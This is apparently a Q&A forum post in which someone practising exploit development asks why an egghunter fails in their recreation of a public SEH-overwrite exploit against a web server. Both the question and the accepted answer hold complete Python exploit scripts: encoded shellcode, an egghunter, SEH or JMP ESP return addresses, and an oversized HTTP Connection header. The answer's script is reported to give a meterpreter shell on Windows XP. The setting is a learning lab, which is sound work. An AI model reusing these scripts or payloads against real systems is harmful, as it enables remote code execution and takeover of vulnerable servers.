# Need help in bypassing Structured Exception Handling (SEH) + egghunter

Tags: penetration-test, exploit, exploit-development, assembly

I am practicing exploit development and trying to remake this exploit by myself in the same environment:
[exploit link](https://www.exploit-db.com/exploits/20876/)

I face an issue that the egghunter is not running I even tried the one in the exploit and it did not run also I run the exploit and it didn't went successful, I tried to use egghunter generated from egghunter.rb tool in the metasploit encoded with different encoders and it didn't went well, then I tested another egghunter generated from mona.py command in the immunity debugger and also it didn't worked, here is the code below:

```
import socket

ip='192.168.163.130'
port=80
#!mona seh
#6FC5447E   5E               POP POP RETN address
seh="\x7e\x44\xc5\x6f"
nseh="\xeb\xE0\x90\x90"
# short jmp back to run egghunter 
#Attempting to encode payload with 1 iterations of x86/alpha_mixed
#x86/alpha_mixed succeeded with size 727 (iteration=0)
#x86/alpha_mixed chosen with final size 727
#Payload size: 727 bytes

shellcode=("\x89\xe2\xdb\xd4\xd9\x72\xf4\x59\x49\x49\x49\x49\x49\x49\x49"
"\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x37\x51\x5a\x6a\x41"
"\x58\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32\x41\x42\x32\x42"
"\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49\x59"
"\x6c\x7a\x48\x4f\x72\x53\x30\x53\x30\x73\x30\x73\x50\x6d\x59"
"\x39\x75\x70\x31\x59\x50\x61\x74\x4c\x4b\x52\x70\x74\x70\x6c"
"\x4b\x61\x42\x74\x4c\x6e\x6b\x33\x62\x65\x44\x6c\x4b\x74\x32"
"\x71\x38\x74\x4f\x4c\x77\x30\x4a\x75\x76\x56\x51\x49\x6f\x6e"
"\x4c\x75\x6c\x30\x61\x33\x4c\x35\x52\x46\x4c\x77\x50\x79\x51"
"\x68\x4f\x56\x6d\x67\x71\x58\x47\x59\x72\x7a\x52\x36\x32\x53"
"\x67\x4c\x4b\x73\x62\x36\x70\x6c\x4b\x61\x5a\x67\x4c\x4c\x4b"
"\x52\x6c\x47\x61\x44\x38\x78\x63\x32\x68\x36\x61\x6e\x31\x46"
"\x31\x4e\x6b\x72\x79\x51\x30\x73\x31\x48\x53\x4e\x6b\x71\x59"
"\x45\x48\x4b\x53\x35\x6a\x70\x49\x6e\x6b\x36\x54\x6c\x4b\x67"
"\x71\x4e\x36\x45\x61\x59\x6f\x6e\x4c\x4a\x61\x6a\x6f\x66\x6d"
"\x53\x31\x39\x57\x76\x58\x49\x70\x50\x75\x5a\x56\x44\x43\x71"
"\x6d\x4b\x48\x65\x6b\x53\x4d\x34\x64\x61\x65\x6a\x44\x46\x38"
"\x4e\x6b\x73\x68\x67\x54\x33\x31\x58\x53\x73\x56\x6c\x4b\x66"
"\x6c\x70\x4b\x6e\x6b\x31\x48\x65\x4c\x46\x61\x6a\x73\x6e\x6b"
"\x57\x74\x6c\x4b\x75\x51\x68\x50\x6f\x79\x50\x44\x51\x34\x77"
"\x54\x73\x6b\x61\x4b\x43\x51\x52\x79\x73\x6a\x56\x31\x6b\x4f"
"\x6b\x50\x51\x4f\x61\x4f\x62\x7a\x4c\x4b\x64\x52\x68\x6b\x6c"
"\x4d\x63\x6d\x72\x48\x77\x43\x64\x72\x57\x70\x33\x30\x71\x78"
"\x50\x77\x53\x43\x44\x72\x53\x6f\x56\x34\x61\x78\x50\x4c\x64"
"\x37\x77\x56\x53\x37\x6b\x4f\x79\x45\x6d\x68\x6e\x70\x56\x61"
"\x33\x30\x33\x30\x75\x79\x69\x54\x63\x64\x76\x30\x65\x38\x64"
"\x69\x6b\x30\x52\x4b\x47\x70\x59\x6f\x4e\x35\x51\x7a\x76\x65"
"\x73\x58\x4f\x30\x79\x38\x6f\x53\x6b\x33\x73\x58\x55\x52\x77"
"\x70\x64\x51\x63\x6c\x4e\x69\x4b\x56\x32\x70\x72\x70\x30\x50"
"\x66\x30\x77\x30\x72\x70\x67\x30\x50\x50\x52\x48\x39\x7a\x56"
"\x6f\x49\x4f\x6b\x50\x69\x6f\x6a\x75\x4e\x77\x63\x5a\x36\x70"
"\x32\x76\x63\x67\x62\x48\x7a\x39\x6c\x65\x30\x74\x31\x71\x6b"
"\x4f\x4e\x35\x4b\x35\x49\x50\x52\x54\x65\x5a\x59\x6f\x30\x4e"
"\x67\x78\x43\x45\x5a\x4c\x6b\x58\x43\x51\x35\x50\x73\x30\x47"
"\x70\x62\x4a\x65\x50\x61\x7a\x37\x74\x76\x36\x32\x77\x55\x38"
"\x65\x52\x39\x49\x59\x58\x71\x4f\x69\x6f\x78\x55\x4b\x33\x4c"
"\x38\x43\x30\x63\x4e\x34\x76\x6c\x4b\x34\x76\x30\x6a\x53\x70"
"\x72\x48\x77\x70\x64\x50\x57\x70\x63\x30\x31\x46\x51\x7a\x75"
"\x50\x70\x68\x30\x58\x6f\x54\x72\x73\x5a\x45\x79\x6f\x6a\x75"
"\x4d\x43\x51\x43\x33\x5a\x43\x30\x71\x46\x33\x63\x36\x37\x31"
"\x78\x46\x62\x78\x59\x5a\x68\x33\x6f\x39\x6f\x68\x55\x4f\x73"
"\x58\x78\x47\x70\x73\x4d\x55\x72\x33\x68\x53\x58\x63\x30\x37"
"\x30\x73\x30\x65\x50\x51\x7a\x33\x30\x32\x70\x73\x58\x44\x4b"
"\x36\x4f\x34\x4f\x56\x50\x59\x6f\x7a\x75\x33\x67\x52\x48\x33"
"\x45\x50\x6e\x70\x4d\x75\x31\x59\x6f\x6a\x75\x53\x6e\x63\x6e"
"\x39\x6f\x34\x4c\x57\x54\x49\x79\x51\x61\x79\x6f\x4b\x4f\x49"
"\x6f\x65\x51\x59\x53\x67\x59\x78\x46\x74\x35\x4f\x37\x48\x43"
"\x4f\x4b\x6c\x30\x6e\x55\x4e\x42\x56\x36\x50\x6a\x53\x30\x42"
"\x73\x4b\x4f\x79\x45\x41\x41")
egghunter=(
"\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e\x3c\x05\x5a\x74"
"\xef\xb8\x77\x30\x30\x74\x8b\xfa\xaf\x75\xea\xaf\x75\xe7\xff\xe7"
)
payload="A"*2248+egghunter+nseh+seh+"D"*(5005-2280-4-4-62)
s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((ip, port))
request=("GET / HTTP/1.1\r\n"
"User-Agent: Mozilla/5.0 (X11; Linux i686; rv:45.0) Gecko/20100101 Firefox/45.0\r\n"
"Accept-Language: "+"w00tw00t"+shellcode+"\r\n"
"Accept-Encoding: deflate, gzip\r\n"
"cookie: frmUserName=test; frmUserPass=pass; rememberPass=202%2C197%2C208%2C215%2C201; UserID=ID; PassWD=PassWD\r\n"
"Connection: "+payload+"\r\n\r\n")
s.send(request)
s.recv(1024)
s.close();
```

and here is the images from the debugger:

[image: as you can see this what happens when I send the payload]

note: since stack overflow is not allowing me to put more than two links I will put the rest of the images links at the end.

as you can see every thing in the exploit is running fine but once it's started to run the egghunter an error occurs, I edited my code and I recalculated the payload with different generated one created by mona this time, and unfortunately, it didn't work, so anyone can help me please to know what is the problem ?

from my part I think the issue is access violation that the egghunter cannot read the memory, is it possible to fix this issue  any help please ?

https:// i.stack.imgur.com/94st2.png

https:// i.stack.imgur.com/dDFLN.png

https:// i.stack.imgur.com/ePd8u.png

https:// i.stack.imgur.com/VP0Un.png

https:// i.stack.imgur.com/5xPdx.png

Answer (score 0, accepted):

I have found the solution, first of all the correct environment is not windows 7, it's windows xp, I don't know why the egghunter is not running in windows 7 though but I have tested the following exploit and it works perfectly on windows xp

```
import socket

ip='192.168.163.128'
port=80

#Payload size: 360 bytes
#bad charecters "\x00\x0a\x0d\x0e\xfe\x5c"
shellcode=(
"\xdb\xc9\xba\xbf\x25\xd3\xec\xd9\x74\x24\xf4\x5e\x33\xc9\xb1"
"\x54\x83\xc6\x04\x31\x56\x14\x03\x56\xab\xc7\x26\x10\x3b\x85"
"\xc9\xe9\xbb\xea\x40\x0c\x8a\x2a\x36\x44\xbc\x9a\x3c\x08\x30"
"\x50\x10\xb9\xc3\x14\xbd\xce\x64\x92\x9b\xe1\x75\x8f\xd8\x60"
"\xf5\xd2\x0c\x43\xc4\x1c\x41\x82\x01\x40\xa8\xd6\xda\x0e\x1f"
"\xc7\x6f\x5a\x9c\x6c\x23\x4a\xa4\x91\xf3\x6d\x85\x07\x88\x37"
"\x05\xa9\x5d\x4c\x0c\xb1\x82\x69\xc6\x4a\x70\x05\xd9\x9a\x49"
"\xe6\x76\xe3\x66\x15\x86\x23\x40\xc6\xfd\x5d\xb3\x7b\x06\x9a"
"\xce\xa7\x83\x39\x68\x23\x33\xe6\x89\xe0\xa2\x6d\x85\x4d\xa0"
"\x2a\x89\x50\x65\x41\xb5\xd9\x88\x86\x3c\x99\xae\x02\x65\x79"
"\xce\x13\xc3\x2c\xef\x44\xac\x91\x55\x0e\x40\xc5\xe7\x4d\x0c"
"\x2a\xca\x6d\xcc\x24\x5d\x1d\xfe\xeb\xf5\x89\xb2\x64\xd0\x4e"
"\xb5\x5e\xa4\xc1\x48\x61\xd5\xc8\x8e\x35\x85\x62\x27\x36\x4e"
"\x73\xc8\xe3\xfb\x76\x5e\xcc\x54\xdb\x1d\xa4\xa6\x1c\x30\x69"
"\x2e\xfa\x62\xc1\x60\x53\xc2\xb1\xc0\x03\xaa\xdb\xce\x7c\xca"
"\xe3\x04\x15\x60\x0c\xf1\x4d\x1c\xb5\x58\x05\xbd\x3a\x77\x63"
"\xfd\xb1\x72\x93\xb3\x31\xf6\x87\xa3\x23\xf8\x57\x33\xce\xf8"
"\x3d\x37\x58\xae\xa9\x35\xbd\x98\x75\xc6\xe8\x9a\x72\x38\x6d"
"\xab\x09\x0e\xfb\x93\x65\x6e\xeb\x13\x76\x38\x61\x14\x1e\x9c"
"\xd1\x47\x3b\xe3\xcf\xfb\x90\x71\xf0\xad\x45\xd2\x98\x53\xb3"
"\x14\x07\xab\x96\x27\x40\x53\x64\x05\xe9\x3c\x96\x09\x09\xbd"
"\xfc\x89\x59\xd5\x0b\xa6\x56\x15\xf3\x6d\x3f\x3d\x7e\xe3\x8d"
"\xdc\x7f\x2e\x53\x41\x7f\xdc\x48\x94\x0e\x23\x6f\x99\xf0\x18"
"\xb9\xa0\x86\x59\x79\x97\x99\xd0\xdc\xbe\x33\x1a\x72\xc0\x11"
)
#size 32
egghunter=(
"\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e\x3c\x05\x5a\x74"
"\xef\xb8\x77\x30\x30\x74\x8b\xfa\xaf\x75\xea\xaf\x75\xe7\xff\xe7"
)
#78196D4D   FFE4             JMP ESP
jmpESP="\x4d\x6d\x19\x78"
payload="A"*2048+jmpESP+egghunter+"D"*(2100-4-2048)

s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((ip, port))
request=("GET / HTTP/1.1\r\n"
"User-Agent: Mozilla/5.0 (X11; Linux i686; rv:45.0) Gecko/20100101 Firefox/45.0\r\n"
"Accept-Language: "+"w00tw00t"+shellcode+"\r\n"
"Accept-Encoding: deflate, gzip\r\n"
"cookie: frmUserName=test; frmUserPass=pass; rememberPass=202%2C197%2C208%2C215%2C201; UserID=ID; PassWD=PassWD\r\n"
"Connection: "+payload+"\r\n\r\n")
s.send(request)
s.recv(1024)
s.close();
```

[image: the server working on windows xp]
[image: running the exploit and receiving meterpreter shell]

but tell now I don't now how to run the same exploit on windows 7, any help please?